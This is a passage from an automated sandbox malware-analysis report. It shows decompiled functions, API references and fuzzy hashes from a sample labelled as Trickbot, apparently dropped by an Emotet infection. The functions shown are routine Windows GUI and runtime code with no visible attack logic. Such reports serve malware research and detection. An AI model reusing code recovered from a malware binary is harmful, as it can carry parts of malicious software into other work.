                          • GetWindow.USER32(00000000,00000002), ref: 004231E1
                          • GetWindowLongA.USER32(00000000,000000F0), ref: 004231F0
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MessageSend$Window$Long
                          • String ID:
                          • API String ID: 2965483870-0
                          • Opcode ID: 6b310d737563514cba5873572198cb5c49260d0c529e2cc1dbb8f76df7cedd54
                          • Instruction ID: 52a1fb7029db56fec016f2777fd38856a271451d11a9507dbd238d9ef48929f7
                          • Opcode Fuzzy Hash: 6b310d737563514cba5873572198cb5c49260d0c529e2cc1dbb8f76df7cedd54
                          • Instruction Fuzzy Hash: 8A11483230032AAFC2219F24EC44E7B77A8EF833A5F05021AF4519B290CB386D118A79
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0042DD87(intOrPtr __ecx, struct HWND__* _a4, unsigned int _a8) {
                          				intOrPtr _v8;
                          				char _v268;
                          				void* __ebp;
                          				int _t20;
                          				unsigned int _t39;
                          				intOrPtr _t45;
                          
                          				_v8 = __ecx;
                          				_t45 =  *((intOrPtr*)(E00432562() + 4));
                          				if(_t45 != 0 && _a8 != 0) {
                          					_t39 = _a8 >> 0x10;
                          					if(_t39 != 0) {
                          						_t20 =  *(_t45 + 0xb0);
                          						if(_a8 == _t20 && _t39 ==  *(_t45 + 0xb2)) {
                          							GlobalGetAtomNameA(_t20,  &_v268, 0x103);
                          							GlobalAddAtomA( &_v268);
                          							GlobalGetAtomNameA( *(_t45 + 0xb2),  &_v268, 0x103);
                          							GlobalAddAtomA( &_v268);
                          							SendMessageA(_a4, 0x3e4,  *(_v8 + 0x1c), ( *(_t45 + 0xb2) & 0x0000ffff) << 0x00000010 |  *(_t45 + 0xb0) & 0x0000ffff);
                          						}
                          					}
                          				}
                          				return 0;
                          			}

                          APIs
                          • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 0042DDE9
                          • GlobalAddAtomA.KERNEL32(?), ref: 0042DDF8
                          • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 0042DE0E
                          • GlobalAddAtomA.KERNEL32(?), ref: 0042DE17
                          • SendMessageA.USER32(?,000003E4,?,?), ref: 0042DE3B
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: AtomGlobal$Name$MessageSend
                          • String ID:
                          • API String ID: 1515195355-0
                          • Opcode ID: cf648b128c842a3be20496c9249eca8f14ef7bb6dbd7c0954b06a59677297fb6
                          • Instruction ID: d23d5cd3cee687374455251e2c5dfc6ab9c60739f91a2db05045cf6e9b85a4a8
                          • Opcode Fuzzy Hash: cf648b128c842a3be20496c9249eca8f14ef7bb6dbd7c0954b06a59677297fb6
                          • Instruction Fuzzy Hash: 4E118275900218AADB20EF64EC44BEBB3BDEF54700F014456E59597180E7B8AFC0CB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 89%
                          			E004193D1() {
                          				CHAR* _t35;
                          				WNDCLASSA* _t37;
                          				void* _t40;
                          				void* _t42;
                          
                          				E00405340(E004377F8, _t40);
                          				_t37 =  *(_t40 + 8);
                          				 *((intOrPtr*)(_t40 - 0x10)) = _t42 - 0x30;
                          				if(GetClassInfoA(_t37->hInstance, _t37->lpszClassName, _t40 - 0x38) != 0) {
                          					L5:
                          					_push(1);
                          					_pop(0);
                          					L6:
                          					 *[fs:0x0] =  *((intOrPtr*)(_t40 - 0xc));
                          					return 0;
                          				}
                          				if(RegisterClassA(_t37) != 0) {
                          					if( *((intOrPtr*)(E00432562() + 0x14)) != 0) {
                          						E004330FA(1);
                          						 *(_t40 - 4) = 0;
                          						_t9 = E00432562() + 0x34; // 0x34
                          						_t35 = _t9;
                          						lstrcatA(_t35, _t37->lpszClassName);
                          						 *(_t40 + 0xa) = 0xa;
                          						 *((char*)(_t40 + 0xb)) = 0;
                          						lstrcatA(_t35, _t40 + 0xa);
                          						 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
                          						E0043316A(1);
                          					}
                          					goto L5;
                          				}
                          				goto L6;
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 004193D6
                          • GetClassInfoA.USER32(?,?,?), ref: 004193F1
                          • RegisterClassA.USER32(?), ref: 004193FC
                          • lstrcatA.KERNEL32(00000034,?,00000001), ref: 00419433
                          • lstrcatA.KERNEL32(00000034,?), ref: 00419441
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Classlstrcat$H_prologInfoRegister
                          • String ID:
                          • API String ID: 106226465-0
                          • Opcode ID: cc7567838c53c84fda94d59d8eb3afb562a4490fc6628ce5f25176632f354622
                          • Instruction ID: e344387831f26c0ba60798fb2310eb8a0951f993e028fd3d0391761737ab876e
                          • Opcode Fuzzy Hash: cc7567838c53c84fda94d59d8eb3afb562a4490fc6628ce5f25176632f354622
                          • Instruction Fuzzy Hash: 34112B75508204BEDB10EFA4DD41ADE7BB8EF18714F00551BF802A7151C7B8EF428B69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 58%
                          			E0042ECBE(void* __eax, void* __ebx, void* __edx, signed int _a4, long _a8) {
                          				struct HWND__* _v8;
                          				long _t33;
                          				void* _t40;
                          				int _t43;
                          				struct HWND__* _t47;
                          				void* _t49;
                          
                          				 *((intOrPtr*)(_t49 + __eax + 0x6a)) =  *((intOrPtr*)(_t49 + __eax + 0x6a)) + __edx;
                          				 *((intOrPtr*)(__eax - 0x15)) =  *((intOrPtr*)(__eax - 0x15)) + __ebx;
                          				_push(_t49);
                          				_push(0x98);
                          				_push(__ebx);
                          				_t40 = 0x98;
                          				if(GetKeyState(0x11) < 0) {
                          					_push(8);
                          					_pop(0);
                          				}
                          				if(GetKeyState(0x10) < 0) {
                          					_push(4);
                          					_pop(0);
                          				}
                          				_t47 = GetFocus();
                          				_v8 = GetDesktopWindow();
                          				if(_t47 != 0) {
                          					_t43 = _a4 << 0x10;
                          					do {
                          						_t33 = SendMessageA(_t47, 0x20a, _t43, _a8);
                          						_t47 = GetParent(_t47);
                          					} while (_t33 == 0 && _t47 != 0 && _t47 != _v8);
                          				} else {
                          					_t33 = SendMessageA( *(_t40 + 0x1c), 0x20a, _a4 << 0x10, _a8);
                          				}
                          				return _t33;
                          			}

                          APIs
                          • GetKeyState.USER32(00000011), ref: 0042ECE4
                          • GetKeyState.USER32(00000010), ref: 0042ECF4
                          • GetFocus.USER32 ref: 0042ED04
                          • GetDesktopWindow.USER32 ref: 0042ED0C
                          • SendMessageA.USER32(?,0000020A,?,?), ref: 0042ED30
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: State$DesktopFocusMessageSendWindow
                          • String ID:
                          • API String ID: 2814764316-0
                          • Opcode ID: 78f3289676728ec7c430074fa4a0741f0a68352bbb13ac36b7cd3c032ab2592b
                          • Instruction ID: e26d5c3a50eb72497c11d98db4b862705f00d333b81dfebf8a3e9653c5300b22
                          • Opcode Fuzzy Hash: 78f3289676728ec7c430074fa4a0741f0a68352bbb13ac36b7cd3c032ab2592b
                          • Instruction Fuzzy Hash: 7601D832B01225BFEB001A96EC49FA87798DB147A4F504427FA42D7281D9F89C4356A8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 59%
                          			E00435271(void* __ecx, char _a8) {
                          				struct tagPOINT _v12;
                          				void* __ebp;
                          				void* _t15;
                          				void* _t24;
                          				void* _t26;
                          				intOrPtr* _t28;
                          
                          				_push(__ecx);
                          				_push(__ecx);
                          				_t26 = __ecx;
                          				if(_a8 == 1) {
                          					GetCursorPos( &_v12);
                          					ScreenToClient( *(_t26 + 0x1c),  &_v12);
                          					if( *((intOrPtr*)(_t26 + 0xec)) == 2 || E00434D19(_t26, _t24,  &_v12,  &_a8) == 0) {
                          						_push(LoadCursorA(0, 0x7f00));
                          					} else {
                          						_t28 = _t26 + 0x100;
                          						if( *_t28 == 0) {
                          							 *_t28 = LoadCursorA( *(E00432562() + 0xc), 0x7902);
                          						}
                          						_push( *_t28);
                          					}
                          					SetCursor();
                          					_t15 = 0;
                          				} else {
                          					_t15 = E004187B4(__ecx);
                          				}
                          				return _t15;
                          			}

                          APIs
                          • GetCursorPos.USER32(?), ref: 0043528A
                          • ScreenToClient.USER32(?,?), ref: 00435297
                          • LoadCursorA.USER32(?,00007902), ref: 004352D2
                          • SetCursor.USER32(00000000), ref: 004352EC
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Cursor$ClientLoadScreen
                          • String ID:
                          • API String ID: 120721131-0
                          • Opcode ID: f430f3dc0f5984a2286113d03436679f97c67de7130d3ecef97d3d433d2c3439
                          • Instruction ID: e1456d8807b83b93601c3d4f2b4a481a1c698153f809d99b1de5ad29577f6afd
                          • Opcode Fuzzy Hash: f430f3dc0f5984a2286113d03436679f97c67de7130d3ecef97d3d433d2c3439
                          • Instruction Fuzzy Hash: 6D017171504204EFDB109FA0DC09EDB77ECEF18315F10946AF946D2290DBB89945CF69
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 91%
                          			E00425ABF(void* __ecx, void* __eflags, int* _a4) {
                          				void* _t14;
                          				int* _t15;
                          				void* _t22;
                          				void* _t26;
                          				void* _t27;
                          				void* _t32;
                          
                          				_t32 = __eflags;
                          				_t22 = __ecx;
                          				_push(GetDC( *(__ecx + 0x1c)));
                          				_t27 = E00420D46();
                          				_t14 = E0042C740(_t32);
                          				_t26 = 0;
                          				if(_t14 != 0) {
                          					_t26 = SelectObject( *(_t27 + 4),  *(_t14 + 4));
                          				}
                          				_t15 = _a4;
                          				_t24 = _t15[1];
                          				PatBlt( *(_t27 + 4),  *_t15, _t15[1], _t15[2] -  *_t15, _t15[3] - _t24, 0x5a0049);
                          				if(_t26 != 0) {
                          					SelectObject( *(_t27 + 4), _t26);
                          				}
                          				return ReleaseDC( *(_t22 + 0x1c),  *(_t27 + 4));
                          			}

                          APIs
                          • GetDC.USER32(?), ref: 00425AC7
                            • Part of subcall function 0042C740: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,0042A724), ref: 0042C77F
                            • Part of subcall function 0042C740: CreatePatternBrush.GDI32(00000000), ref: 0042C78C
                            • Part of subcall function 0042C740: DeleteObject.GDI32(00000000), ref: 0042C798
                          • SelectObject.GDI32(?,?), ref: 00425AE6
                          • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00425B0E
                          • SelectObject.GDI32(?,00000000), ref: 00425B1D
                          • ReleaseDC.USER32(?,?), ref: 00425B29
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Object$CreateSelect$BitmapBrushDeletePatternRelease
                          • String ID:
                          • API String ID: 2474928807-0
                          • Opcode ID: a88e8238d2fa25ddb1faf6588d1a11480260b01b21abd649efc3a5c2b6a86e80
                          • Instruction ID: 2e252b97cd2aa297da7c2b5f74bc8b2d03b140b747af17399cb68d0102856402
                          • Opcode Fuzzy Hash: a88e8238d2fa25ddb1faf6588d1a11480260b01b21abd649efc3a5c2b6a86e80
                          • Instruction Fuzzy Hash: CB014B76200205AFDB549FA5ED4EC277BAAEB89711305807AF51587232CB76EC11DB24
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00415AB7(void* _a4, void* _a8) {
                          				void* _v12;
                          				DEVMODEA* _t9;
                          				void* _t20;
                          				struct HDC__* _t22;
                          				signed short* _t23;
                          
                          				if(_a4 == 0) {
                          					L5:
                          					return 0;
                          				}
                          				_t23 = GlobalLock(_a4);
                          				_t20 = _a8;
                          				if(_t20 == 0) {
                          					_t9 = 0;
                          				} else {
                          					_t9 = GlobalLock(_t20);
                          				}
                          				if(_t23 != 0) {
                          					_t22 = CreateDCA(_t23 + ( *_t23 & 0x0000ffff), _t23 + (_t23[1] & 0x0000ffff), _t23 + (_t23[2] & 0x0000ffff), _t9);
                          					GlobalUnlock(_v12);
                          					if(_t20 != 0) {
                          						GlobalUnlock(_t20);
                          					}
                          					return _t22;
                          				} else {
                          					goto L5;
                          				}
                          			}

                          APIs
                          • GlobalLock.KERNEL32(?,?,?,00000000,004159E0,?,?,?,00435432,?,?,?,?,00401ED6), ref: 00415ACB
                          • GlobalLock.KERNEL32(?,?,00000000,004159E0,?,?,?,00435432,?,?,?,?,00401ED6), ref: 00415AD8
                          • CreateDCA.GDI32(?,?,?,00000000), ref: 00415AFB
                          • GlobalUnlock.KERNEL32(?,?,00000000,004159E0,?,?,?,00435432,?,?,?,?,00401ED6), ref: 00415B0D
                          • GlobalUnlock.KERNEL32(?,?,00000000,004159E0,?,?,?,00435432,?,?,?,?,00401ED6), ref: 00415B14
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Global$LockUnlock$Create
                          • String ID:
                          • API String ID: 2536725124-0
                          • Opcode ID: b44548100888a0923bcceb94c45566190a79f0afcf222bf1d72181f2492fec3f
                          • Instruction ID: 2c08fb966d1a7657c9be5eb2bf69ce89cebc09f1f78a66de6fdd2645592b3639
                          • Opcode Fuzzy Hash: b44548100888a0923bcceb94c45566190a79f0afcf222bf1d72181f2492fec3f
                          • Instruction Fuzzy Hash: 64F0A472314721DBC770AB299CC4AA77ADCEFC4B91B240826F885D2200D668DC44D774
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E0042CEEB(void* __ecx) {
                          				struct tagMSG _v28;
                          				void* _t9;
                          				void* _t13;
                          				void* _t25;
                          
                          				_t25 = __ecx;
                          				if( *((intOrPtr*)(__ecx + 0x50)) != 0) {
                          					if(PeekMessageA( &_v28,  *(__ecx + 0x1c), 0x367, 0x367, 3) == 0) {
                          						PostMessageA( *(_t25 + 0x1c), 0x367, 0, 0);
                          					}
                          					if(GetCapture() ==  *(_t25 + 0x1c)) {
                          						ReleaseCapture();
                          					}
                          					_t13 = E00419EDA(_t25);
                          					 *((intOrPtr*)(_t25 + 0x50)) = 0;
                          					 *((intOrPtr*)(_t13 + 0x50)) = 0;
                          					return PostMessageA( *(_t25 + 0x1c), 0x36a, 0, 0);
                          				}
                          				return _t9;
                          			}

                          APIs
                          • PeekMessageA.USER32(?,?,00000367,00000367,00000003), ref: 0042CF0C
                          • PostMessageA.USER32(?,00000367,00000000,00000000), ref: 0042CF22
                          • GetCapture.USER32 ref: 0042CF24
                          • ReleaseCapture.USER32 ref: 0042CF2F
                          • PostMessageA.USER32(?,0000036A,00000000,00000000), ref: 0042CF4C
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Message$CapturePost$PeekRelease
                          • String ID:
                          • API String ID: 1125932295-0
                          • Opcode ID: cb40a05a609ce3852dd88cd409f17210669b483ccddc9dc4f3de6c85b3edc9fd
                          • Instruction ID: 312944fcce09cba8e1cf79d00220d8df66d2544df6643da8a0730fbf5c1243bc
                          • Opcode Fuzzy Hash: cb40a05a609ce3852dd88cd409f17210669b483ccddc9dc4f3de6c85b3edc9fd
                          • Instruction Fuzzy Hash: 2BF0A431204748BFC721AF12EC44D1BBFBDFB81748B41452EF14192551C776E9058A68
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00407B13() {
                          				void _t10;
                          				long _t15;
                          				void* _t16;
                          
                          				_t15 = GetLastError();
                          				_t16 = TlsGetValue( *0x448210);
                          				if(_t16 == 0) {
                          					_t16 = E00406991(1, 0x74);
                          					if(_t16 == 0 || TlsSetValue( *0x448210, _t16) == 0) {
                          						E004052AF(0x10);
                          					} else {
                          						E00407B00(_t16);
                          						_t10 = GetCurrentThreadId();
                          						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
                          						 *_t16 = _t10;
                          					}
                          				}
                          				SetLastError(_t15);
                          				return _t16;
                          			}

                          APIs
                          • GetLastError.KERNEL32(?,00000000,00408CE5,00000000,?,?,?,004052A1,?,?,00000000,00000000), ref: 00407B15
                          • TlsGetValue.KERNEL32(?,00000000,00408CE5,00000000,?,?,?,004052A1,?,?,00000000,00000000), ref: 00407B23
                          • SetLastError.KERNEL32(00000000,?,00000000,00408CE5,00000000,?,?,?,004052A1,?,?,00000000,00000000), ref: 00407B6F
                            • Part of subcall function 00406991: HeapAlloc.KERNEL32(00000008,?,?,?,?,00407ACB,00000001,00000074,?,00405217), ref: 004069E6
                          • TlsSetValue.KERNEL32(00000000,?,00000000,00408CE5,00000000,?,?,?,004052A1,?,?,00000000,00000000), ref: 00407B47
                          • GetCurrentThreadId.KERNEL32(?,00000000,00408CE5,00000000,?,?,?,004052A1,?,?,00000000,00000000), ref: 00407B58
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ErrorLastValue$AllocCurrentHeapThread
                          • String ID:
                          • API String ID: 2020098873-0
                          • Opcode ID: 53a44ecace3c589dcac9cf14d62ab24f2b011c4ed0d0c133a374d3aaa4381302
                          • Instruction ID: 90818a2a7397ba7ad137bd5c4078d5426f7f662d2f94fd885d5ed0fba108b92b
                          • Opcode Fuzzy Hash: 53a44ecace3c589dcac9cf14d62ab24f2b011c4ed0d0c133a374d3aaa4381302
                          • Instruction Fuzzy Hash: 2AF06236D45A216BC6212B74AC49A5A3B60EB01775720057EF942A62E0CEBCAC01869D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 47%
                          			E004301F7(struct tagRECT* _a4, long _a8, signed char _a10) {
                          				void* __esi;
                          				void* __ebp;
                          				int _t13;
                          				int _t14;
                          				intOrPtr _t16;
                          				void* _t19;
                          				struct tagRECT* _t21;
                          
                          				if( *0x44b35c != 0) {
                          					return AdjustWindowRectEx(_a4, _a8, 0, 0x188);
                          				}
                          				if((_a8 & 0x00040600) == 0) {
                          					_push(GetSystemMetrics(6));
                          					_push(5);
                          				} else {
                          					_push(GetSystemMetrics(0x21));
                          					_push(0x20);
                          				}
                          				_t13 = GetSystemMetrics();
                          				_t21 = _a4;
                          				_t14 = InflateRect(_t21, _t13, ??);
                          				if((_a10 & 0x000000c0) != 0) {
                          					E0042F264(_t19, _t21);
                          					_t16 =  *0x44b72c; // 0x0
                          					_t21->top = _t21->top - _t16;
                          					return _t16;
                          				}
                          				return _t14;
                          			}

                          0x00430202
                          0x00000000
                          0x00430211
                          0x00430220
                          0x0043023b
                          0x0043023c
                          0x00430222
                          0x0043022c
                          0x0043022d
                          0x0043022d
                          0x0043023e
                          0x00430240
                          0x00430245
                          0x0043024f
                          0x00430251
                          0x00430256
                          0x0043025b
                          0x00000000
                          0x0043025b
                          0x00430260

                          APIs
                          • AdjustWindowRectEx.USER32(?,?,00000000,00000188), ref: 00430211
                          • GetSystemMetrics.USER32(00000021), ref: 0043022A
                          • GetSystemMetrics.USER32(00000005), ref: 0043023E
                          • InflateRect.USER32(?,00000000), ref: 00430245
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MetricsRectSystem$AdjustInflateWindow
                          • String ID:
                          • API String ID: 4080371637-0
                          • Opcode ID: c2f9182dacb039938dbfeebd1a145ead52bc5e7b718ac6c8aac088017c69c67c
                          • Instruction ID: 2c9188706850b99474bb3fa86ac7d3974e7e0159557212c360b896dc1d203508
                          • Opcode Fuzzy Hash: c2f9182dacb039938dbfeebd1a145ead52bc5e7b718ac6c8aac088017c69c67c
                          • Instruction Fuzzy Hash: 51F0AF32141218BBDB109FA59C09BAB3B68EB15B10F449166BE185A1E0C7B49D11CFAE
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00432990(long* __ecx) {
                          				long _t4;
                          				intOrPtr _t5;
                          				void* _t6;
                          				void* _t13;
                          				intOrPtr _t14;
                          				long* _t15;
                          
                          				_t15 = __ecx;
                          				_t4 =  *__ecx;
                          				if(_t4 != 0xffffffff) {
                          					TlsFree(_t4);
                          				}
                          				_t1 = _t15 + 0x14; // 0x1c5398
                          				_t5 =  *_t1;
                          				if(_t5 != 0) {
                          					do {
                          						_t14 =  *((intOrPtr*)(_t5 + 4));
                          						E00432C5C(_t15, _t5, 0);
                          						_t5 = _t14;
                          					} while (_t14 != 0);
                          				}
                          				_t3 = _t15 + 0x10; // 0x1cbf10
                          				_t6 =  *_t3;
                          				if(_t6 != 0) {
                          					_t13 = GlobalHandle(_t6);
                          					GlobalUnlock(_t13);
                          					_t6 = GlobalFree(_t13);
                          				}
                          				DeleteCriticalSection(_t15 + 0x1c);
                          				return _t6;
                          			}

                          0x00432991
                          0x00432994
                          0x00432999
                          0x0043299c
                          0x0043299c
                          0x004329a2
                          0x004329a2
                          0x004329a7
                          0x004329a9
                          0x004329a9
                          0x004329b1
                          0x004329b8
                          0x004329b8
                          0x004329a9
                          0x004329bc
                          0x004329bc
                          0x004329c1
                          0x004329ca
                          0x004329cd
                          0x004329d4
                          0x004329d4
                          0x004329de
                          0x004329e6

                          APIs
                          • TlsFree.KERNEL32(00000000,?,?,00432E9D,00000000,00000001), ref: 0043299C
                          • GlobalHandle.KERNEL32(001CBF10), ref: 004329C4
                          • GlobalUnlock.KERNEL32(00000000,?,?,00432E9D,00000000,00000001), ref: 004329CD
                          • GlobalFree.KERNEL32(00000000), ref: 004329D4
                          • DeleteCriticalSection.KERNEL32(0044B484,?,?,00432E9D,00000000,00000001), ref: 004329DE
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Global$Free$CriticalDeleteHandleSectionUnlock
                          • String ID:
                          • API String ID: 2159622880-0
                          • Opcode ID: c69d353ba9ce2d79b22686ab7108aaff9864a546e41db3e0ee4118bc377a497d
                          • Instruction ID: abedf2684a00f37dac84e1b8fe2f22d1e9d2dc83754f70f29763ab916e8b2090
                          • Opcode Fuzzy Hash: c69d353ba9ce2d79b22686ab7108aaff9864a546e41db3e0ee4118bc377a497d
                          • Instruction Fuzzy Hash: 31F054713006006FD7209B39AD48B6B76ADAF88721F15155AF855D3391CBB8DC02866D
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E00436282(void* __ecx) {
                          				int _t22;
                          
                          				_t22 = SaveDC( *(__ecx + 8));
                          				if( *(__ecx + 4) == 0) {
                          					 *((intOrPtr*)(__ecx + 0x1c)) = 0x7fff;
                          				} else {
                          					SelectObject( *(__ecx + 4), GetStockObject(0xd));
                          					 *((intOrPtr*)(__ecx + 0x1c)) = SaveDC( *(__ecx + 4)) - _t22;
                          					SelectObject( *(__ecx + 4),  *(__ecx + 0x28));
                          				}
                          				return _t22;
                          			}

                          0x00436296
                          0x00436298
                          0x004362c4
                          0x0043629a
                          0x004362ad
                          0x004362b9
                          0x004362bf
                          0x004362c1
                          0x004362d0

                          APIs
                          • SaveDC.GDI32(?), ref: 00436290
                          • GetStockObject.GDI32(0000000D), ref: 0043629D
                          • SelectObject.GDI32(00000000,00000000), ref: 004362AD
                          • SaveDC.GDI32(00000000), ref: 004362B2
                          • SelectObject.GDI32(00000000,?), ref: 004362BF
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Object$SaveSelect$Stock
                          • String ID:
                          • API String ID: 2785865535-0
                          • Opcode ID: 5f4e7535a614563e03e4b539d9225fb8cf9caa6961f17facdb117b74df09aca8
                          • Instruction ID: 3ebbcc448a9f6894ef9655ec6489c54b754031be1484e3425d52e819444ca3b9
